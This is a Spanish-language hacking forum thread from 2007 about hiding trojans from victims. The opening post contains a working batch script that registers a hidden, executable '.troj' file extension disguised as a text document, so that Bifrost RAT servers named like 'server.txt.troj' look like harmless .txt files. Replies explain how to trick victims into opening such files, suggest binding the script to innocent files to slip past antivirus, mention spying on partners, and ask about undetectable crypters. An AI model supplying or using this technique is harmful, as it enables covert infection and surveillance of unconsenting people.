elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
24 Mayo 2012, 06:51  


Tema destacado: Grupo de Facebook de elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Karcrack, [Zero])
| | |-+  Ocultacion de troyanos
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ocultacion de troyanos  (Leído 2,172 veces)
NaXo__

Desconectado Desconectado

Mensajes: 144


...ReQuiem For A Drink....


Ver Perfil
Ocultacion de troyanos
« en: 6 Noviembre 2007, 14:27 »

Buenas a todos, me he estado leyendo un post del brujo sobre la ocultacion de troyanos
http://foro.elhacker.net/index.php/topic,248.0.html

Yo abri el bloc de notas y copie este codigo bat:

@echo off
@echo REGEDIT4>%TEMP%\troj.reg
@echo [HKEY_CLASSES_ROOT\.troj]>>%TEMP%\troj.reg
@echo @="trojfile">>%TEMP%\troj.reg
@echo [HKEY_CLASSES_ROOT\trojfile]>>%TEMP%\troj.reg
@echo @="Documento de texto">>%TEMP%\troj.reg
@echo "NeverShowExt"="">>%TEMP%\troj.reg
@echo [HKEY_CLASSES_ROOT\trojfile\Shell\Open\Command]>>%TEMP%\troj.reg
@echo@=hex(2):22,00,25,00,31,00,22,00,20,00,25,00,2a,00,00,00>>%TEMP%\troj.reg
regedit /s %TEMP%\troj.reg
del %TEMP%\troj.reg

lo guarde como troj.bat, y se lo envie a mi victima y lo acepto y lo ejecuto, ahora le envio los "servers" creados por el bifrost despues de compilarlos en formato server.txt.troj, considerando que ahora el .troj en el pc de la victima es considerado ejecutable..
Esta bien hecho?????He seguido bien los pasos???? GRACIAS
En línea

¿De donde sacara las pelas la luna para salir todas las noches?
Bakura182

Desconectado Desconectado

Mensajes: 254


No existe gran talento sin gran voluntad-Honoré B.


Ver Perfil
Re: Ocultacion de troyanos
« Respuesta #1 en: 9 Noviembre 2007, 01:25 »

Me intereso eso del archivo BAT pero no entendi  ;D alguien me lo podria explicar porfavor???

Gracias de antemano..



SALU.D.O.S
En línea
~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.983


Ver Perfil WWW
Re: Ocultacion de troyanos
« Respuesta #2 en: 9 Noviembre 2007, 14:48 »

Pues lo q se supone q hace (q no lo e provado) es crear una nueva extension en el reg q siempre este oculta y q sea ejecutable (como un exe) asi si tu llamas a tu server server.txt.troj en el otro pc aparecera como un archivo del block de notas cuando en realidad es un ejecutable, y se infectara claro xDD
En línea
Man-In-the-Middle
Colaborador
***
Desconectado Desconectado

Mensajes: 3.645



Ver Perfil
Re: Ocultacion de troyanos
« Respuesta #3 en: 9 Noviembre 2007, 20:47 »

Pero eso solo sirve para un cliente especifico, el booom seria que fuera tipo spray
y que infecte poco a poco uuuuuuuuuu  :xD
En línea
Bakura182

Desconectado Desconectado

Mensajes: 254


No existe gran talento sin gran voluntad-Honoré B.


Ver Perfil
Re: Ocultacion de troyanos
« Respuesta #4 en: 10 Noviembre 2007, 02:53 »

haaa... le voy agarrando la mano... (al tema, no??? jaja XD), Una preg tonta... Como hago esa extensión .txt.troj??? si es muy tonta no la respondan  :(
a quien le doy esa extensión, al troyano despues de ser compilado o a otro archivo??

Y gracias por haberme explicado, a ambos  ;D


SALUD.O.S
En línea
papanoel_devacaciones


Desconectado Desconectado

Mensajes: 428


Ver Perfil
Re: Ocultacion de troyanos
« Respuesta #5 en: 10 Noviembre 2007, 03:13 »

haaa... le voy agarrando la mano... (al tema, no??? jaja XD), Una preg tonta... Como hago esa extensión .txt.troj??? si es muy tonta no la respondan  :(
a quien le doy esa extensión, al troyano despues de ser compilado o a otro archivo??

Y gracias por haberme explicado, a ambos  ;D


SALUD.O.S

Lo primero creas este archivo...despues se lo envias a tu victuma ella lo acepta (una vez aceptado y ejecutado..el crea una nueva extension en el pc de la victima) tu le mandas extensiones como "nombre.txt.troj" y lo que la victima vera es  "nombre.txt" asi si tu troyano se llama server.exe simplemente le cambias el icono a un documento txt y le pones de nombre "texto.txt.troj"...........lo recibe la victima que solo ve que es "texto.txt" lo abre pensando que es un txt y ya esta infectada....lo malo es que creo que el msn reconocera todas las extensiones...osea cuando intentes mandar un archivo te diria el nombre completo y su extension...

Por cierto es necesario que lleve la @ delante de todos los "echo" yo siempre la he puesto sin @ osea pongo @echo off y despues el el codigo pero sin mas @ ??

Saludos
« Última modificación: 10 Noviembre 2007, 03:15 por ☺Şm0ќè=hack=™☺ » En línea
Bakura182

Desconectado Desconectado

Mensajes: 254


No existe gran talento sin gran voluntad-Honoré B.


Ver Perfil
Re: Ocultacion de troyanos
« Respuesta #6 en: 10 Noviembre 2007, 04:02 »

Citar
Lo primero creas este archivo...despues se lo envias a tu victuma ella lo acepta (una vez aceptado y ejecutado..el crea una nueva extension en el pc de la victima) tu le mandas extensiones como "nombre.txt.troj" y lo que la victima vera es  "nombre.txt" asi si tu troyano se llama server.exe simplemente le cambias el icono a un documento txt y le pones de nombre "texto.txt.troj"...........lo recibe la victima que solo ve que es "texto.txt" lo abre pensando que es un txt y ya esta infectada....lo malo es que creo que el msn reconocera todas las extensiones...osea cuando intentes mandar un archivo te diria el nombre completo y su extension...

Muchisimas gracias!!! "Smoke=Hack", ya lo entendi pero te queria preguntar que si se puede encryptar el archivo bat y si se puede adjuntar con otro archivo?? Si no?? XD bueno, si èl ejecuta el BAT, no lo detecta el antivirus???


SALUD.O.S

En línea
papanoel_devacaciones


Desconectado Desconectado

Mensajes: 428


Ver Perfil
Re: Ocultacion de troyanos
« Respuesta #7 en: 10 Noviembre 2007, 05:02 »

no todos los bat se detectan por los antivirus.....y si seria mejor unirlo a un archivo inocente  :xD :xD


Saludos
En línea
~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.983


Ver Perfil WWW
Re: Ocultacion de troyanos
« Respuesta #8 en: 10 Noviembre 2007, 12:08 »

A mi la verdad este metodo siempre me parecio un poco chorrada.. si ya tienes q embiar un ejecutable (y q lo ejecuten) para despues mandar un exe, por q no enviar directamente el exe y ya haces lo q kieres?
En línea
Man-In-the-Middle
Colaborador
***
Desconectado Desconectado

Mensajes: 3.645



Ver Perfil
Re: Ocultacion de troyanos
« Respuesta #9 en: 10 Noviembre 2007, 19:19 »

Por que ese metodo, es como le llaman  Fishing tune, que no es como tirar una red y cojer loq ue caiga


Esto, se puede hacer via, cualquier programacion, no canta mucho(si es que no canta nada), se puede hacer de muchas maneras, no solo con ese codigo hay infinidad, remplazar extensiones jpg(exe), etc etc

Y bueno, cundo tienes un buen panorama de tu victima, sistema operativo, privilegios, antivirus, etc, le mandas un buen troyano, y lo tienes perpetuo!!ç

De tipo, marido celoso, enamorada pendenciera, entro  otros.

Como dicen EON, es cojudicimo mandar 2 exes, si con uno te puedes evitar toda la churrada, perooooo de que es mas efectivo el otro metodo lo es!!

Saludos
MITM
« Última modificación: 10 Noviembre 2007, 19:22 por Man-in-the-middle » En línea
thunderdome

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: Ocultacion de troyanos
« Respuesta #10 en: 12 Noviembre 2007, 22:40 »

hola muy buenas a todos,bueno la verdad que escribo porque tengo la picha hecha un lio.......veran,tengo el bifrost desde hace una semana mas o menos y me eh metido en cantidad de paginas  y foros  para ilustrarme un poco sobre este mundo de los troyanos y cada ves que innto muchas de las cosas que dicen a mi no me funciona,ya puede ser porque el link de alguna pagina esta rota,en construcion,o me manda a alcarajo,porque me salen paginas de flores,contactos etc etc etc,bueno mis preguntas son las siguientes....¿ahi algun binder,joiner o camuflador(lo mismo) que sea indetectable?(que lo dudo)si es asi en donde lo puedo conseguir...no os lo tomeis a mal,no quiero llegar y besar el santo,eh buscado en cantidad de sitios incluido aqui,y la informacion e buenisima lo que pasa(leer mas arriba ya lo dije).bueno otra pregunta¿he leido que cuando se manda un server,del troyano que sea,pues al abrirlo la victima,me refiero al paquete,pues los antivirus lo captan,aunque tengan cifrado el server,¿pregunta........se puede hacer invisible el paquete que mandas,encriptandolo me refiero,para que al abrirlo el AV no lo detecte y pase desapersibido?¿cuantos programas se an de utilizar para poder llegar a hacer eso(si es que se puede?bueno y esto como comentario personal,al descargarme tanto el cactus joiner,como el fire joiner,entre otros....porque me sale una pantalla de error(perdon por no decir que clase de error es)y no me deja instalar ese programa...bueno antes de despedirme,eh de decir que perdonen si os he molestado,no es mi intension,pido disculpas por las posibles faltas ortograficas y por ser tan pesado,escribiendo este manuscrito,pero es que por mas que busco me dan mas ganas de mandar al carajo todo y con perdon,bueno ahora si qe me despido,un saludo para todos y espero que almenos alguien me diga algo,cualkier cosa me vale,PD.......disculpen y gracias de ante mano. ;)
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines